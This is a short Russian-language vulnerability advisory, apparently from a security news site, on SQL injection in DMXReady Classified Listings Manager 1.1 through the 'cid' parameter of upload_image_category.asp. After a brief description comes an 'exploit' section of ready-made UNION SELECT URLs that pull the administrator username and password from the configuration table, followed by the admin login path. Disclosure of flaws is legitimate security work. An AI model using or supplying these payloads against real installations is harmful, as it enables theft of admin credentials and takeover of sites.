• Партнер

  • Программа: DMXReady Classified Listings Manager 1.1

    Уязвимость позволяет удаленному пользователю выполнить произвольные SQL
    команды в базе данных приложения. Уязвимость существует из-за недостаточной
    обработки входных данных в параметре «cid» сценарием /upload_image_category.asp.
    Удаленный пользователь может с помощью специально сформированного запроса
    выполнить произвольные SQL команды в базе данных приложения.

    Эксплоит:

    http://[target]/[path]//admin/ClassifiedListingsManager/components/CategoryManager/upload_image_category.asp?cid=[SQL
    Inject]

    USERNAME:

    /admin/ClassifiedListingsManager/components/CategoryManager/upload_image_category.asp?cid=5
    union select 0,Security_AdminUserName,2,5,9,3 from tblCLM_config

    PASSWORD:

    /admin/ClassifiedListingsManager/components/CategoryManager/upload_image_category.asp?cid=5
    union select 0,Security_AdminPassword,2,5,9,3 from tblCLM_config

    ADMIN LOGIN:

    http://[target]/[path]//admin/ClassifiedListingsManager/manage.asp

    Подписаться
    Уведомить о
    0 комментариев
    Межтекстовые Отзывы
    Посмотреть все комментарии